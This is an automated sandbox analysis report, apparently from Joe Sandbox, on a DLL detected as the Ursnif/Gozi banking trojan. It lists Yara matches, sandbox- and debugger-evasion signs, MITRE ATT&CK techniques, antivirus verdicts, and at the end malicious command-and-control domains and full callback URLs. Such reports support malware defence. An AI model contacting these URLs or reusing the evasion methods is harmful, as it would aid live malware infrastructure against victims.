Source: Yara match	File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00721174 IsIconic,	0_2_00721174
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00E37170 IsIconic,GetWindowPlacement,GetWindowRect,	3_2_00E37170
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00E5D24C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	3_2_00E5D24C

Source: C:\Windows\System32\loaddll32.exe

0_2_0072921C

Source: C:\Windows\SysWOW64\WerFault.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking system information)

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep

graph_3-18255

Contains functionality to detect sleep reduction / modifications

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0072C54C		0_2_0072C54C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00E3C54C		3_2_00E3C54C

Source: C:\Windows\SysWOW64\rundll32.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe	Window / User API: threadDelayed 1014	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Window / User API: threadDelayed 432	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Window / User API: threadDelayed 1247	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Window / User API: threadDelayed 805	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Window / User API: threadDelayed 867	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Window / User API: threadDelayed 964	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0072C54C		0_2_0072C54C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00E3C54C		3_2_00E3C54C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0072165C GetSystemInfo,

0_2_0072165C

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007053C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,		0_2_007053C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00E153C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,		3_2_00E153C4

Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node			graph_3-18577
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node			graph_3-18940

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: loaddll32.exe, 00000000.00000002.777216026.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772918664.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWve MAC Layer LightWeight Filter-0000
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: loaddll32.exe, 00000000.00000002.777216026.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.439117348.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750087069.0000000000A8E000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772918664.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000007.00000002.314927336.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312790180.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312588018.0000000004A62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Windows\SysWOW64\rundll32.exe

Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep

graph_3-18255

Source: C:\Windows\System32\loaddll32.exe

0_2_0072921C

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Memory protected: page write copy | page execute and write copy | page guard

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	0_2_0070557C
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,GetACP,	0_2_0070C804
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,	0_2_0070B148
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,	0_2_0070B194
Source: C:\Windows\System32\loaddll32.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	0_2_00705688
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	3_2_00E1557C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	3_2_00E1B194
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	3_2_00E1B148
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	3_2_00E15688
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetACP,	3_2_00E1C804
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	3_2_00E15E74

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_00E19C14 GetLocalTime,

3_2_00E19C14

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0070C10C GetVersionExA,

0_2_0070C10C

Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe

Stealing of Sensitive Information

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
Source: Yara match	File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
Source: Yara match	File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	31 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	11 Native API	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	1 Screen Capture	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	116 System Information Discovery	SMB/Windows Admin Shares	31 Input Capture	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	231 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 Virtualization/Sandbox Evasion	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Process Injection	DCSync	11 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Rundll32	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
hFGZpat9Mf.dll	21%	Virustotal		Browse
hFGZpat9Mf.dll	33%	ReversingLabs	Win32.Infostealer.Gozi
hFGZpat9Mf.dll	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.0.rundll32.exe.1080000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
0.2.loaddll32.exe.890184.1.unpack	100%	Avira	TR/Kazy.4159236	Download File
3.2.rundll32.exe.e10000.0.unpack	100%	Avira	HEUR/AGEN.1108767	Download File
3.0.rundll32.exe.ed0184.5.unpack	100%	Avira	TR/Kazy.4159236	Download File
0.2.loaddll32.exe.2500000.4.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
3.0.rundll32.exe.ed0184.1.unpack	100%	Avira	TR/Kazy.4159236	Download File
3.2.rundll32.exe.1080000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
3.0.rundll32.exe.e10000.0.unpack	100%	Avira	HEUR/AGEN.1108767	Download File
0.2.loaddll32.exe.9e0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
3.0.rundll32.exe.e10000.4.unpack	100%	Avira	HEUR/AGEN.1108767	Download File
3.0.rundll32.exe.1080000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
3.2.rundll32.exe.ed0184.1.unpack	100%	Avira	TR/Kazy.4159236	Download File
0.2.loaddll32.exe.700000.0.unpack	100%	Avira	HEUR/AGEN.1108767	Download File

Domains

Source	Detection	Scanner	Label	Link
giporedtrip.at	12%	Virustotal		Browse
habpfans.at	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.dhtmlcentral.com/forums/forum.asp?FORUM_ID=2&CAT_ID=1&Forum_Title=CoolMenus	0%	Virustotal		Browse
http://www.dhtmlcentral.com/forums/forum.asp?FORUM_ID=2&CAT_ID=1&Forum_Title=CoolMenus	0%	Avira URL Cloud	safe
http://31.214.157.187/drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk	0%	Avira URL Cloud	safe
http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk	100%	Avira URL Cloud	malware
